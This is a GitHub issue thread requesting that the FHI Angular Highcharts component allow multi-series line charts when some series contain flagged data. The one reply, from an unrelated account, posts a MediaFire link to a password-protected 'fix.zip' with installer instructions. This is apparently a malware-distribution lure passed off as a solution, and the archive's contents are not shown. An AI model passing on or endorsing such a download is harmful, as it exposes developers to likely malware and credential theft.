### ISSUE TITLE
FHI Angular Highcharts: Enable chart type line with multiple series even if flagged data

### ISSUE THREAD

**Issue by proand** [folkehelseinstituttet/Fhi.Frontend.Demo#638]
### Description

Currently it's not possible to show a line diagram with multiple series i one or more series contains flagged data. This should be allowed.

### Acceptance Criteria

1. Go to https://dev-designsystem.fhi.no/developer/components/highcharts#highcharts-all-inclusive
2. Select data set [comming...]
3. Confirm that diagram looks similar to fig. below (other data, but same concept with broken lines)

### Additional information

![Image](https://github.com/user-attachments/assets/960ec4ae-dba3-457a-8050-d9bc8002d179)

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
